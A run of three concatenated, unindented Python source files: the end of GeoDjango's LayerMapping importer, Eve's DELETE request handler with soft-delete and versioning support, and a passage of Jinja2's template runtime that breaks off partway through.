raise LayerMapError('No source reference system defined.')
else:
return sr
def check_unique(self, unique):
"Checks the `unique` keyword parameter -- may be a sequence or string."
if isinstance(unique, (list, tuple)):
# List of fields to determine uniqueness with
for attr in unique:
if not attr in self.mapping: raise ValueError
elif isinstance(unique, basestring):
# Only a single field passed in.
if unique not in self.mapping: raise ValueError
else:
raise TypeError('Unique keyword argument must be set with a tuple, list, or string.')
#### Keyword argument retrieval routines ####
def feature_kwargs(self, feat):
"""
Given an OGR Feature, this will return a dictionary of keyword arguments
for constructing the mapped model.
"""
# The keyword arguments for model construction.
kwargs = {}
# Incrementing through each model field and OGR field in the
# dictionary mapping.
for field_name, ogr_name in self.mapping.items():
model_field = self.fields[field_name]
if isinstance(model_field, GeometryField):
# Verify OGR geometry.
val = self.verify_geom(feat.geom, model_field)
elif isinstance(model_field, models.base.ModelBase):
# The related _model_, not a field was passed in -- indicating
# another mapping for the related Model.
val = self.verify_fk(feat, model_field, ogr_name)
else:
# Otherwise, verify OGR Field type.
val = self.verify_ogr_field(feat[ogr_name], model_field)
# Setting the keyword arguments for the field name with the
# value obtained above.
kwargs[field_name] = val
return kwargs
def unique_kwargs(self, kwargs):
"""
Given the feature keyword arguments (from `feature_kwargs`) this routine
will construct and return the uniqueness keyword arguments -- a subset
of the feature kwargs.
"""
if isinstance(self.unique, basestring):
return {self.unique : kwargs[self.unique]}
else:
return dict((fld, kwargs[fld]) for fld in self.unique)
#### Verification routines used in constructing model keyword arguments. ####
def verify_ogr_field(self, ogr_field, model_field):
"""
Verifies if the OGR Field contents are acceptable to the Django
model field. If they are, the verified value is returned,
otherwise the proper exception is raised.
"""
if (isinstance(ogr_field, OFTString) and
isinstance(model_field, (models.CharField, models.TextField))):
if self.encoding:
# The encoding for OGR data sources may be specified here
# (e.g., 'cp437' for Census Bureau boundary files).
val = unicode(ogr_field.value, self.encoding)
else:
val = ogr_field.value
if len(val) > model_field.max_length:
raise InvalidString('%s model field maximum string length is %s, given %s characters.' %
(model_field.name, model_field.max_length, len(val)))
elif isinstance(ogr_field, OFTReal) and isinstance(model_field, models.DecimalField):
try:
# Creating an instance of the Decimal value to use.
d = Decimal(str(ogr_field.value))
except:
raise InvalidDecimal('Could not construct decimal from: %s' % ogr_field.value)
# Getting the decimal value as a tuple.
dtup = d.as_tuple()
digits = dtup[1]
d_idx = dtup[2] # index where the decimal is
# Maximum amount of precision, or digits to the left of the decimal.
max_prec = model_field.max_digits - model_field.decimal_places
# Getting the digits to the left of the decimal place for the
# given decimal.
if d_idx < 0:
n_prec = len(digits[:d_idx])
else:
n_prec = len(digits) + d_idx
# If we have more than the maximum digits allowed, then throw an
# InvalidDecimal exception.
if n_prec > max_prec:
raise InvalidDecimal('A DecimalField with max_digits %d, decimal_places %d must round to an absolute value less than 10^%d.' %
(model_field.max_digits, model_field.decimal_places, max_prec))
val = d
elif isinstance(ogr_field, (OFTReal, OFTString)) and isinstance(model_field, models.IntegerField):
# Attempt to convert any OFTReal and OFTString value to an OFTInteger.
try:
val = int(ogr_field.value)
except:
raise InvalidInteger('Could not construct integer from: %s' % ogr_field.value)
else:
val = ogr_field.value
return val
def verify_fk(self, feat, rel_model, rel_mapping):
"""
Given an OGR Feature, the related model and its dictionary mapping,
this routine will retrieve the related model for the ForeignKey
mapping.
"""
# TODO: It is expensive to retrieve a model for every record --
# explore if an efficient mechanism exists for caching related
# ForeignKey models.
# Constructing and verifying the related model keyword arguments.
fk_kwargs = {}
for field_name, ogr_name in rel_mapping.items():
fk_kwargs[field_name] = self.verify_ogr_field(feat[ogr_name], rel_model._meta.get_field(field_name))
# Attempting to retrieve and return the related model.
try:
return rel_model.objects.get(**fk_kwargs)
except ObjectDoesNotExist:
raise MissingForeignKey('No ForeignKey %s model found with keyword arguments: %s' % (rel_model.__name__, fk_kwargs))
def verify_geom(self, geom, model_field):
"""
Verifies the geometry -- will construct and return a GeometryCollection
if necessary (for example if the model field is MultiPolygonField while
the mapped shapefile only contains Polygons).
"""
if self.make_multi(geom.geom_type, model_field):
# Constructing a multi-geometry type to contain the single geometry
multi_type = self.MULTI_TYPES[geom.geom_type.num]
g = OGRGeometry(multi_type)
g.add(geom)
else:
g = geom
# Transforming the geometry with our Coordinate Transformation object,
# but only if the class variable `transform` is set w/a CoordTransform
# object.
if self.transform: g.transform(self.transform)
# Returning the WKT of the geometry.
return g.wkt
#### Other model methods ####
def coord_transform(self):
"Returns the coordinate transformation object."
try:
# Getting the target spatial reference system
target_srs = SpatialRefSys.objects.get(srid=self.geo_col.srid).srs
# Creating the CoordTransform object
return CoordTransform(self.source_srs, target_srs)
except Exception, msg:
raise LayerMapError('Could not translate between the data source and model geometry: %s' % msg)
def geometry_column(self):
"Returns the GeometryColumn model associated with the geographic column."
# Getting the GeometryColumn object.
try:
db_table = self.model._meta.db_table
if SpatialBackend.name == 'oracle': db_table = db_table.upper()
gc_kwargs = {GeometryColumns.table_name_col() : db_table}
return GeometryColumns.objects.get(**gc_kwargs)
except Exception, msg:
raise LayerMapError('Geometry column does not exist for model. (did you run syncdb?):\n %s' % msg)
def make_multi(self, geom_type, model_field):
"""
Given the OGRGeomType for a geometry and its associated GeometryField,
determine whether the geometry should be turned into a GeometryCollection.
"""
return (geom_type.num in self.MULTI_TYPES and
model_field.__class__.__name__ == 'Multi%s' % geom_type.django)
def save(self, verbose=False, fid_range=False, step=False,
progress=False, silent=False, stream=sys.stdout, strict=False):
"""
Saves the contents from the OGR DataSource Layer into the database
according to the mapping dictionary given at initialization.
Keyword Parameters:
verbose:
If set, information will be printed subsequent to each model save
executed on the database.
fid_range:
May be set with a slice or tuple of (begin, end) feature ID's to map
from the data source. In other words, this keyword enables the user
to selectively import a subset range of features in the geographic
data source.
step:
If set with an integer, transactions will occur at every step
interval. For example, if step=1000, a commit would occur after
the 1,000th feature, the 2,000th feature etc.
progress:
When this keyword is set, status information will be printed giving
the number of features processed and sucessfully saved. By default,
progress information will pe printed every 1000 features processed,
however, this default may be overridden by setting this keyword with an
integer for the desired interval.
stream:
Status information will be written to this file handle. Defaults to
using `sys.stdout`, but any object with a `write` method is supported.
silent:
By default, non-fatal error notifications are printed to stdout, but
this keyword may be set to disable these notifications.
strict:
Execution of the model mapping will cease upon the first error
encountered. The default behavior is to attempt to continue.
"""
# Getting the default Feature ID range.
default_range = self.check_fid_range(fid_range)
# Setting the progress interval, if requested.
if progress:
if progress is True or not isinstance(progress, int):
progress_interval = 1000
else:
progress_interval = progress
# Defining the 'real' save method, utilizing the transaction
# decorator created during initialization.
@self.transaction_decorator
def _save(feat_range=default_range, num_feat=0, num_saved=0):
if feat_range:
layer_iter = self.layer[feat_range]
else:
layer_iter = self.layer
for feat in layer_iter:
num_feat += 1
# Getting the keyword arguments
try:
kwargs = self.feature_kwargs(feat)
except LayerMapError, msg:
# Something borked the validation
if strict: raise
elif not silent:
stream.write('Ignoring Feature ID %s because: %s\n' % (feat.fid, msg))
else:
# Constructing the model using the keyword args
is_update = False
if self.unique:
# If we want unique models on a particular field, handle the
# geometry appropriately.
try:
# Getting the keyword arguments and retrieving
# the unique model.
u_kwargs = self.unique_kwargs(kwargs)
m = self.model.objects.get(**u_kwargs)
is_update = True
# Getting the geometry (in OGR form), creating
# one from the kwargs WKT, adding in additional
# geometries, and update the attribute with the
# just-updated geometry WKT.
geom = getattr(m, self.geom_field).ogr
new = OGRGeometry(kwargs[self.geom_field])
for g in new: geom.add(g)
setattr(m, self.geom_field, geom.wkt)
except ObjectDoesNotExist:
# No unique model exists yet, create.
m = self.model(**kwargs)
else:
m = self.model(**kwargs)
try:
# Attempting to save.
m.save()
num_saved += 1
if verbose: stream.write('%s: %s\n' % (is_update and 'Updated' or 'Saved', m))
except SystemExit:
raise
except Exception, msg:
if self.transaction_mode == 'autocommit':
# Rolling back the transaction so that other model saves
# will work.
transaction.rollback_unless_managed()
if strict:
# Bailing out if the `strict` keyword is set.
if not silent:
stream.write('Failed to save the feature (id: %s) into the model with the keyword arguments:\n' % feat.fid)
stream.write('%s\n' % kwargs)
raise
elif not silent:
stream.write('Failed to save %s:\n %s\nContinuing\n' % (kwargs, msg))
# Printing progress information, if requested.
if progress and num_feat % progress_interval == 0:
stream.write('Processed %d features, saved %d ...\n' % (num_feat, num_saved))
# Only used for status output purposes -- incremental saving uses the
# values returned here.
return num_saved, num_feat
nfeat = self.layer.num_feat
if step and isinstance(step, int) and step < nfeat:
# Incremental saving is requested at the given interval (step)
if default_range:
raise LayerMapError('The `step` keyword may not be used in conjunction with the `fid_range` keyword.')
beg, num_feat, num_saved = (0, 0, 0)
indices = range(step, nfeat, step)
n_i = len(indices)
for i, end in enumerate(indices):
# Constructing the slice to use for this step; the last slice is
# special (e.g, [100:] instead of [90:100]).
if i+1 == n_i: step_slice = slice(beg, None)
else: step_slice = slice(beg, end)
try:
num_feat, num_saved = _save(step_slice, num_feat, num_saved)
beg = end
except:
stream.write('%s\nFailed to save slice: %s\n' % ('=-' * 20, step_slice))
raise
else:
# Otherwise, just calling the previously defined _save() function.
_save()
|
|
# -*- coding: utf-8 -*-
"""
eve.methods.delete
~~~~~~~~~~~~~~~~~~
This module imlements the DELETE method.
:copyright: (c) 2015 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from flask import current_app as app, abort
from eve.utils import config, debug_error_message, ParsedRequest
from eve.auth import requires_auth
from eve.methods.common import get_document, ratelimit, pre_event, \
oplog_push, resolve_document_etag
from eve.versioning import versioned_id_field, resolve_document_version, \
insert_versioning_documents, late_versioning_catch
from datetime import datetime
import copy
@ratelimit()
@requires_auth('item')
@pre_event
def deleteitem(resource, **lookup):
"""
Default function for handling DELETE requests, it has decorators for
rate limiting, authentication and for raising pre-request events.
After the decorators are applied forwards to call to
:func:`deleteitem_internal`
.. versionchanged:: 0.5
Split into deleteitem() and deleteitem_internal().
"""
return deleteitem_internal(resource, concurrency_check=True, **lookup)
def deleteitem_internal(
resource, concurrency_check=False, suppress_callbacks=False, **lookup):
""" Intended for internal delete calls, this method is not rate limited,
authentication is not checked, pre-request events are not raised, and
concurrency checking is optional. Deletes a resource item.
:param resource: name of the resource to which the item(s) belong.
:param concurrency_check: concurrency check switch (bool)
:param **lookup: item lookup query.
.. versionchanged:: 0.6
Support for soft delete.
.. versionchanged:: 0.5
Return 204 NoContent instead of 200.
Push updates to OpLog.
Original deleteitem() has been split into deleteitem() and
deleteitem_internal().
.. versionchanged:: 0.4
Fix #284: If you have a media field, and set datasource projection to
0 for that field, the media will not be deleted.
Support for document versioning.
'on_delete_item' events raised before performing the delete.
'on_deleted_item' events raised after performing the delete.
.. versionchanged:: 0.3
Delete media files as needed.
Pass the explicit query filter to the data driver, as it does not
support the id argument anymore.
.. versionchanged:: 0.2
Raise pre_<method> event.
.. versionchanged:: 0.0.7
Support for Rate-Limiting.
.. versionchanged:: 0.0.5
Pass current resource to ``parse_request``, allowing for proper
processing of new configuration settings: `filters`, `sorting`, `paging`.
.. versionchanged:: 0.0.4
Added the ``requires_auth`` decorator.
"""
soft_delete_enabled = config.DOMAIN[resource]['soft_delete']
original = get_document(resource, concurrency_check, **lookup)
if not original or (soft_delete_enabled and
original.get(config.DELETED) is True):
abort(404)
# notify callbacks
if suppress_callbacks is not True:
getattr(app, "on_delete_item")(resource, original)
getattr(app, "on_delete_item_%s" % resource)(original)
if soft_delete_enabled:
# Instead of removing the document from the db, just mark it as deleted
marked_document = copy.deepcopy(original)
# Set DELETED flag and update metadata
last_modified = datetime.utcnow().replace(microsecond=0)
marked_document[config.DELETED] = True
marked_document[config.LAST_UPDATED] = last_modified
if config.IF_MATCH:
resolve_document_etag(marked_document, resource)
resolve_document_version(marked_document, resource, 'DELETE', original)
# Update document in database (including version collection if needed)
id = original[config.ID_FIELD]
try:
app.data.replace(resource, id, marked_document, original)
except app.data.OriginalChangedError:
if concurrency_check:
abort(412, description=debug_error_message(
'Client and server etags don\'t match'
))
# create previous version if it wasn't already there
late_versioning_catch(original, resource)
# and add deleted version
insert_versioning_documents(resource, marked_document)
else:
# Delete the document for real
# media cleanup
media_fields = app.config['DOMAIN'][resource]['_media']
# document might miss one or more media fields because of datasource
# and/or client projection.
missing_media_fields = [f for f in media_fields if f not in original]
if len(missing_media_fields):
# retrieve the whole document so we have all media fields available
# Should be very a rare occurence. We can't get rid of the
# get_document() call since it also deals with etag matching, which
# is still needed. Also, this lookup should never fail.
# TODO not happy with this hack. Not at all. Is there a better way?
original = app.data.find_one_raw(
resource, original[config.ID_FIELD])
for field in media_fields:
if field in original:
app.media.delete(original[field])
id = original[config.ID_FIELD]
app.data.remove(resource, {config.ID_FIELD: id})
# TODO: should attempt to delete version collection even if setting is
# off
if app.config['DOMAIN'][resource]['versioning'] is True:
app.data.remove(
resource + config.VERSIONS,
{versioned_id_field(): original[config.ID_FIELD]})
# update oplog if needed
oplog_push(resource, original, 'DELETE', id)
if suppress_callbacks is not True:
getattr(app, "on_deleted_item")(resource, original)
getattr(app, "on_deleted_item_%s" % resource)(original)
return {}, None, None, 204
@requires_auth('resource')
@pre_event
def delete(resource, **lookup):
""" Deletes all item of a resource (collection in MongoDB terms). Won't
drop indexes. Use with caution!
.. versionchanged:: 0.5
Return 204 NoContent instead of 200.
.. versionchanged:: 0.4
Support for document versioning.
'on_delete_resource' raised before performing the actual delete.
'on_deleted_resource' raised after performing the delete
.. versionchanged:: 0.3
Support for the lookup filter, which allows for develtion of
sub-resources (only delete documents that match a given condition).
.. versionchanged:: 0.0.4
Added the ``requires_auth`` decorator.
.. versionadded:: 0.0.2
"""
getattr(app, "on_delete_resource")(resource)
getattr(app, "on_delete_resource_%s" % resource)()
if config.DOMAIN[resource]['soft_delete']:
# Soft delete all items not already marked deleted
# (by default, data.find doesn't return soft deleted items)
default_request = ParsedRequest()
cursor = app.data.find(resource, default_request, lookup)
for document in list(cursor):
document_id = document[app.config['ID_FIELD']]
deleteitem_internal(resource, concurrency_check=False,
suppress_callbacks=True, _id=document_id)
else:
# TODO if the resource schema includes media files, these won't be
# deleted by use of this global method (it should be disabled). Media
# cleanup is handled at the item endpoint by the delete() method
# (see above).
app.data.remove(resource, lookup)
# TODO: should attempt to delete version collection even if setting is
# off
if app.config['DOMAIN'][resource]['versioning'] is True:
app.data.remove(resource + config.VERSIONS, lookup)
getattr(app, "on_deleted_resource")(resource)
getattr(app, "on_deleted_resource_%s" % resource)()
return {}, None, None, 204
|
|
# -*- coding: utf-8 -*-
"""
jinja2.runtime
~~~~~~~~~~~~~~
Runtime helpers.
:copyright: (c) 2017 by the Jinja Team.
:license: BSD.
"""
import sys
from itertools import chain
from types import MethodType
from jinja2.nodes import EvalContext, _context_function_types
from jinja2.utils import Markup, soft_unicode, escape, missing, concat, \
internalcode, object_type_repr, evalcontextfunction, Namespace
from jinja2.exceptions import UndefinedError, TemplateRuntimeError, \
TemplateNotFound
from jinja2._compat import imap, text_type, iteritems, \
implements_iterator, implements_to_string, string_types, PY2, \
with_metaclass
# these variables are exported to the template runtime
__all__ = ['LoopContext', 'TemplateReference', 'Macro', 'Markup',
'TemplateRuntimeError', 'missing', 'concat', 'escape',
'markup_join', 'unicode_join', 'to_string', 'identity',
'TemplateNotFound', 'Namespace']
#: the name of the function that is used to convert something into
#: a string. We can just use the text type here.
to_string = text_type
#: the identity function. Useful for certain things in the environment
identity = lambda x: x
_first_iteration = object()
_last_iteration = object()
def markup_join(seq):
"""Concatenation that escapes if necessary and converts to unicode."""
buf = []
iterator = imap(soft_unicode, seq)
for arg in iterator:
buf.append(arg)
if hasattr(arg, '__html__'):
return Markup(u'').join(chain(buf, iterator))
return concat(buf)
def unicode_join(seq):
"""Simple args to unicode conversion and concatenation."""
return concat(imap(text_type, seq))
def new_context(environment, template_name, blocks, vars=None,
shared=None, globals=None, locals=None):
"""Internal helper to for context creation."""
if vars is None:
vars = {}
if shared:
parent = vars
else:
parent = dict(globals or (), **vars)
if locals:
# if the parent is shared a copy should be created because
# we don't want to modify the dict passed
if shared:
parent = dict(parent)
for key, value in iteritems(locals):
if value is not missing:
parent[key] = value
return environment.context_class(environment, parent, template_name,
blocks)
class TemplateReference(object):
"""The `self` in templates."""
def __init__(self, context):
self.__context = context
def __getitem__(self, name):
blocks = self.__context.blocks[name]
return BlockReference(name, self.__context, blocks, 0)
def __repr__(self):
return '<%s %r>' % (
self.__class__.__name__,
self.__context.name
)
def _get_func(x):
return getattr(x, '__func__', x)
class ContextMeta(type):
def __new__(cls, name, bases, d):
rv = type.__new__(cls, name, bases, d)
if bases == ():
return rv
resolve = _get_func(rv.resolve)
default_resolve = _get_func(Context.resolve)
resolve_or_missing = _get_func(rv.resolve_or_missing)
default_resolve_or_missing = _get_func(Context.resolve_or_missing)
# If we have a changed resolve but no changed default or missing
# resolve we invert the call logic.
if resolve is not default_resolve and \
resolve_or_missing is default_resolve_or_missing:
rv._legacy_resolve_mode = True
elif resolve is default_resolve and \
resolve_or_missing is default_resolve_or_missing:
rv._fast_resolve_mode = True
return rv
def resolve_or_missing(context, key, missing=missing):
if key in context.vars:
return context.vars[key]
if key in context.parent:
return context.parent[key]
return missing
class Context(with_metaclass(ContextMeta)):
"""The template context holds the variables of a template. It stores the
values passed to the template and also the names the template exports.
Creating instances is neither supported nor useful as it's created
automatically at various stages of the template evaluation and should not
be created by hand.
The context is immutable. Modifications on :attr:`parent` **must not**
happen and modifications on :attr:`vars` are allowed from generated
template code only. Template filters and global functions marked as
:func:`contextfunction`\\s get the active context passed as first argument
and are allowed to access the context read-only.
The template context supports read only dict operations (`get`,
`keys`, `values`, `items`, `iterkeys`, `itervalues`, `iteritems`,
`__getitem__`, `__contains__`). Additionally there is a :meth:`resolve`
method that doesn't fail with a `KeyError` but returns an
:class:`Undefined` object for missing variables.
"""
# XXX: we want to eventually make this be a deprecation warning and
# remove it.
_legacy_resolve_mode = False
_fast_resolve_mode = False
def __init__(self, environment, parent, name, blocks):
self.parent = parent
self.vars = {}
self.environment = environment
self.eval_ctx = EvalContext(self.environment, name)
self.exported_vars = set()
self.name = name
# create the initial mapping of blocks. Whenever template inheritance
# takes place the runtime will update this mapping with the new blocks
# from the template.
self.blocks = dict((k, [v]) for k, v in iteritems(blocks))
# In case we detect the fast resolve mode we can set up an alias
# here that bypasses the legacy code logic.
if self._fast_resolve_mode:
self.resolve_or_missing = MethodType(resolve_or_missing, self)
def super(self, name, current):
"""Render a parent block."""
try:
blocks = self.blocks[name]
index = blocks.index(current) + 1
blocks[index]
except LookupError:
return self.environment.undefined('there is no parent block '
'called %r.' % name,
name='super')
return BlockReference(name, self, blocks, index)
def get(self, key, default=None):
"""Returns an item from the template context, if it doesn't exist
`default` is returned.
"""
try:
return self[key]
except KeyError:
return default
def resolve(self, key):
"""Looks up a variable like `__getitem__` or `get` but returns an
:class:`Undefined` object with the name of the name looked up.
"""
if self._legacy_resolve_mode:
rv = resolve_or_missing(self, key)
else:
rv = self.resolve_or_missing(key)
if rv is missing:
return self.environment.undefined(name=key)
return rv
def resolve_or_missing(self, key):
"""Resolves a variable like :meth:`resolve` but returns the
special `missing` value if it cannot be found.
"""
if self._legacy_resolve_mode:
rv = self.resolve(key)
if isinstance(rv, Undefined):
rv = missing
return rv
return resolve_or_missing(self, key)
def get_exported(self):
"""Get a new dict with the exported variables."""
return dict((k, self.vars[k]) for k in self.exported_vars)
def get_all(self):
"""Return the complete context as dict including the exported
variables. For optimizations reasons this might not return an
actual copy so be careful with using it.
"""
if not self.vars:
return self.parent
if not self.parent:
return self.vars
return dict(self.parent, **self.vars)
@internalcode
def call(__self, __obj, *args, **kwargs):
"""Call the callable with the arguments and keyword arguments
provided but inject the active context or environment as first
argument if the callable is a :func:`contextfunction` or
:func:`environmentfunction`.
"""
if __debug__:
__traceback_hide__ = True # noqa
# Allow callable classes to take a context
fn = __obj.__call__
for fn_type in ('contextfunction',
'evalcontextfunction',
'environmentfunction'):
if hasattr(fn, fn_type):
__obj = fn
break
if isinstance(__obj, _context_function_types):
if getattr(__obj, 'contextfunction', 0):
args = (__self,) + args
elif getattr(__obj, 'evalcontextfunction', 0):
args = (__self.eval_ctx,) + args
elif getattr(__obj, 'environmentfunction', 0):
args = (__self.environment,) + args
try:
return __obj(*args, **kwargs)
except StopIteration:
return __self.environment.undefined('value was undefined because '
'a callable raised a '
'StopIteration exception')
def derived(self, locals=None):
"""Internal helper function to create a derived context. This is
used in situations where the system needs a new context in the same
template that is independent.
"""
context = new_context(self.environment, self.name, {},
self.get_all(), True, None, locals)
context.eval_ctx = self.eval_ctx
context.blocks.update((k, list(v)) for k, v in iteritems(self.blocks))
return context
def _all(meth):
proxy = lambda self: getattr(self.get_all(), meth)()
proxy.__doc__ = getattr(dict, meth).__doc__
proxy.__name__ = meth
return proxy
keys = _all('keys')
values = _all('values')
items = _all('items')
# not available on python 3
if PY2:
iterkeys = _all('iterkeys')
itervalues = _all('itervalues')
iteritems = _all('iteritems')
del _all
def __contains__(self, name):
return name in self.vars or name in self.parent
def __getitem__(self, key):
"""Lookup a variable or raise `KeyError` if the variable is
undefined.
"""
item = self.resolve_or_missing(key)
if item is missing:
raise KeyError(key)
return item
def __repr__(self):
return '<%s %s of %r>' % (
self.__class__.__name__,
repr(self.get_all()),
self.name
)
# register the context as mapping if possible
try:
from collections import Mapping
Mapping.register(Context)
except ImportError:
pass
class BlockReference(object):
"""One block on a template reference."""
def __init__(self, name, context, stack, depth):
self.name = name
self._context = context
self._stack = stack
self._depth = depth
@property
def super(self):
"""Super the block."""
if self._depth + 1 >= len(self._stack):
return self._context.environment. \
undefined('there is no parent block called %r.' %
self.name, name='super')
return BlockReference(self.name, self._context, self._stack,
self._depth + 1)
@internalcode
def __call__(self):
rv = concat(self._stack[self._depth](self._context))
if self._context.eval_ctx.autoescape:
rv = Markup(rv)
return rv
class LoopContextBase(object):
"""A loop context for dynamic iteration."""
_before = _first_iteration
_current = _first_iteration
_after = _last_iteration
_length = None
def __init__(self, undefined, recurse=None, depth0=0):
self._undefined = undefined
self._recurse = recurse
self.index0 = -1
self.depth0 = depth0
self._last_checked_value = missing
def cycle(self, *args):
"""Cycles among the arguments with the current loop index."""
if not args:
raise TypeError('no items for cycling given')
return args[self.index0 % len(args)]
def changed(self, *value):
"""Checks whether the value has changed since the last call."""
if self._last_checked_value != value:
self._last_checked_value = value
return True
return False
first = property(lambda x: x.index0 == 0)
last = property(lambda x: x._after is _last_iteration)
index = property(lambda x: x.index0 + 1)
revindex = property(lambda x: x.length - x.index0)
revindex0 = property(lambda x: x.length - x.index)
depth = property(lambda x: x.depth0 + 1)
@property
def previtem(self):
if self._before is _first_iteration:
return self._undefined('there is no previous item')
return self._before
@property
def nextitem(self):
if self._after is _last_iteration:
return self._undefined('there is no next item')
return self._after
def __len__(self):
return self.length
@internalcode
def loop(self, iterable):
if self._recurse is None:
raise TypeError('Tried to call non recursive loop. Maybe you '
"forgot the 'recursive' modifier.")
return self._recurse(iterable, self._recurse, self.depth0 + 1)
# a nifty trick to enhance the error message if someone tried to call
# the the loop without or with too many arguments.
__call__ = loop
del loop
def __repr__(self):
return '<%s %r/%r>' % (
self.__class__.__name__,
self.index,
self.length
)
class LoopContext(LoopContextBase):
def __init__(self, iterable, undefined, recurse=None, depth0=0):
LoopContextBase.__init__(self, undefined, recurse, depth0)
self._iterator = iter(iterable)
# try to get the length of the iterable early. This must be done
# here because there are some broken iterators around where there
# __len__ is the number of iterations left (i'm looking at your
# listreverseiterator!).
try:
self._length = len(iterable)
except (TypeError, AttributeError):
self._length = None
self._after = self._safe_next()
@property
def length(self):
if self._length is None:
# if was not possible to get the length of the iterator when
# the loop context was created (ie: iterating over a generator)
# we have to convert the iterable into a sequence and use the
# length of that + the number of iterations so far.
iterable = tuple(self._iterator)
self._iterator = iter(iterable)
iterations_done = self.index0 + 2
self._length = len(iterable) + iterations_done
return self._length
def __iter__(self):
return LoopContextIterator(self)
def _safe_next(self):
try:
return next(self._iterator)
except StopIteration:
return _last_iteration
@implements_iterator
class LoopContextIterator(object):
"""The iterator for a loop context."""
__slots__ = ('context',)
def __init__(self, context):
self.context = context
def __iter__(self):
return self
def __next__(self):
ctx = self.context
ctx.index0 += 1
if ctx._after is _last_iteration:
raise StopIteration()
ctx._before = ctx._current
ctx._current = ctx._after
ctx._after = ctx._safe_next()
return ctx._current, ctx
class Macro(object):
"""Wraps a macro function."""
def __init__(self, environment, func, name, arguments,
catch_kwargs, catch_varargs, caller,
default_autoescape=None):
self._environment = environment
self._func = func
self._argument_count = len(arguments)
self.name = name
self.arguments = arguments
self.catch_kwargs = catch_kwargs
self.catch_varargs = catch_varargs
self.caller = caller
self.explicit_caller = 'caller' in arguments
if default_autoescape is None:
default_autoescape = environment.autoescape
self._default_autoescape = default_autoescape
@internalcode
@evalcontextfunction
def __call__(self, *args, **kwargs):
# This requires a bit of explanation, In the past we used to
# decide largely based on compile-time information if a macro is
# safe or unsafe. While there was a volatile mode it was largely
# unused for deciding on escaping. This turns out to be
# problemtic for macros because if a macro is safe or not not so
# much depends on the escape mode when it was defined but when it
# was used.
#
# Because however we export macros from the module system and
# there are historic callers that do not pass an eval context (and
# will continue to not pass one), we need to perform an instance
# check here.
#
# This is considered safe because an eval context is not a valid
# argument to callables otherwise anwyays. Worst case here is
# that if no eval context is passed we fall back to the compile
# time autoescape flag.
if args and isinstance(args[0], EvalContext):
autoescape = args[0].autoescape
args = args[1:]
else:
autoescape = self._default_autoescape
# try to consume the positional arguments
arguments = list(args[:self._argument_count])
off = len(arguments)
# For information why this is necessary refer to the handling
# of caller in the `macro_body` handler in the compiler.
found_caller = False
# if the number of arguments consumed is not the number of
# arguments expected we start filling in keyword arguments
# and defaults.
if off != self._argument_count:
for idx, name in enumerate(self.arguments[len(arguments):]):
try:
value = kwargs.pop(name)
except KeyError:
value = missing
if name == 'caller':
found_caller = True
arguments.append(value)
else:
found_caller = self.explicit_caller
# it's important that the order of these arguments does not change
# if not also changed in the compiler's `function_scoping` method.
# the order is caller, keyword arguments, positional arguments!
if self.caller and not found_caller:
caller = kwargs.pop('caller', None)
if caller is None:
caller = self._environment.undefined('No caller defined',
name='caller')
arguments.append(caller)
if self.catch_kwargs:
arguments.append(kwargs)
elif kwargs:
if 'caller' in kwargs:
raise TypeError('macro %r was invoked with two values for '
'the special caller argument. This is '
'most likely a bug.' % self.name)
raise TypeError('macro %r takes no keyword argument %r' %
(self.name, next(iter(kwargs))))
if self.catch_varargs:
arguments.append(args[self._argument_count:])
elif len(args) > self._argument_count:
raise TypeError('macro %r takes not more than %d argument(s)' %
(self.name, len(self.arguments)))
return self._invoke(arguments, autoescape)
def _invoke(self, arguments, autoescape):
"""This method is being swapped out by the async implementation."""
rv = self._func(*arguments)
if autoescape:
rv = Markup(rv)
return rv
def __repr__(self):
return '<%s %s>' % (
self.__class__.__name__,
self.name is None and 'anonymous' or repr(self.name)
)
@implements_to_string
class Undefined(object):
"""The default undefined type. This undefined type can be printed and
iterated over, but every other access will raise an :exc:`jinja2.exceptions.UndefinedError`:
>>> foo = Undefined(name='foo')
>>> str(foo)
''
>>> not foo
True
>>> foo + 42
Traceback (most recent call last):
...
jinja2.exceptions.UndefinedError: 'foo' is undefined
"""
__slots__ = ('_undefined_hint', '_undefined_obj', '_undefined_name',
'_undefined_exception')
def __init__(self, hint=None, obj=missing, name=None, exc=UndefinedError):
self._undefined_hint = hint
self._undefined_obj = obj
self._undefined_name = name
self._undefined_exception = exc
@internalcode
def _fail_with_undefined_error(self, *args, **kwargs):
"""Regular callback function for undefined objects that raises an
`jinja2.exceptions.UndefinedError` on call.
"""
if self._undefined_hint is None:
if self._undefined_obj is missing:
hint = '%r is undefined' % self._undefined_name
elif not isinstance(self._undefined_name, string_types):
hint = '%s has no element %r' % (
object_type_repr(self._undefined_obj),
self._undefined_name
)
else:
hint = '%r has no attribute %r' % (
object_type_repr(self._undefined_obj),
self._undefined_name
)
else:
hint = self._undefined_hint
raise self._undefined_exception(hint)
@internalcode
def __getattr__(self, name):
if name[:2] == '__':
raise AttributeError(name)
return self._fail_with_undefined_error()
__add__ = __radd__ = __mul__ = __rmul__ = __div__ = __rdiv__ = \
__truediv__ = __rtruediv__ = __floordiv__ = __rfloordiv__ = \
__mod__ = __rmod__ = __pos__ = __neg__ = __call__ = \
__getitem__ = __lt__ = __le__ = __gt__ = __ge__ = __int__ = \
__float__ = __complex__ = __pow__ = __rpow__ = __sub__ = \
__rsub__ = _fail_with_undefined_error
def __eq__(self, other):
return type(self) is type(other)
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return id(type(self))
def __str__(self):
return u''
def __len__(self):
return 0
def __iter__(self):
if 0:
yield None
def __nonzero__(self):
return False
__bool__ = __nonzero__
def __repr__(self):
return 'Undefined'
def make_logging_undefined(logger=None, base=None):
"""Given a logger object this returns a new undefined class that will
log certain failures. It will log iterations and printing. If no
logger is given a default logger is created.
Example::
logger = logging.getLogger(__name__)
LoggingUndefined = make_logging_undefined(
logger=logger,
base=Undefined
)
.. versionadded:: 2.8
:param logger: the logger to use. If not provided, a default logger
is created.
:param base: the base class to add logging functionality to. This
defaults to :class:`Undefined`.
"""
if logger is None:
import logging
logger = logging.getLogger(__name__)
logger.addHandler(logging.StreamHandler(sys.stderr))
if base is None:
base = Undefined
def _log_message(undef):
if undef._undefined_hint is None:
if undef._undefined_obj is missing:
hint = '%s is undefined' % undef._undefined_name
elif not isinstance(undef._undefined_name, string_types):
hint = '%s has no element %s' % (
object_type_repr(undef._undefined_obj),
undef._undefined_name)
else:
hint = '%s has no attribute %s' % (
object_type_repr(undef._undefined_obj),
undef._undefined_name)
else:
hint = undef._undefined_hint
logger.warning('Template variable warning: %s', hint)
class LoggingUndefined(base):
